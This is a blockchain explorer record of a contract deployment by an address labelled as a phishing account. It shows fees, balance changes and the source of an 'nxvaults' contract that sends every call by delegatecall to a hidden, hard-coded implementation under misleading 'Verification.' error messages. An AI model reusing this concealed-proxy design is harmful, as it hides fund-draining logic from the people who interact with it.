Transaction Hash:
Block:
19811542 at May-06-2024 02:08:47 PM +UTC
Transaction Fee:
0.00158466393973569 ETH
$3.79
Gas Used:
163,235 Gas / 9.707868654 Gwei
Account State Difference:
Address | Before | After | State Difference | ||
---|---|---|---|---|---|
0x4838B106...B0BAD5f97
Miner
| (Titan Builder) | 5.134893577650787465 Eth | 5.135009088596597495 Eth | 0.00011551094581003 | |
0x48ca9074...65D1CbBc1 |
0 Eth
Nonce: 0
|
0 Eth
Nonce: 1
| |||
0x936f708E...efBF27986 | (Fake_Phishing328370) |
0.056257321975 Eth
Nonce: 0
|
0.05467265803526431 Eth
Nonce: 1
| 0.00158466393973569 |
Execution Trace
nxvaults.60806040( )

-
0x475524de13f635cbbca065c3b70c35cdeb6125ea.DELEGATECALL( )
// SPDX-License-Identifier: MIT pragma solidity >=0.8.13; contract nxvaults { uint256 private ns = 5005; fallback(bytes calldata data) payable external returns(bytes memory){ (bool r1, bytes memory result) = address(0x475524DE13F635CbBcA065C3B70C35cDEb6125ea).delegatecall(data); require(r1, "Verification."); return result; } receive() payable external { } constructor() { bytes memory data = abi.encodeWithSignature("initialize()"); (bool r1,) = address(0x475524DE13F635CbBcA065C3B70C35cDEb6125ea).delegatecall(data); require(r1, "Verificiation."); } }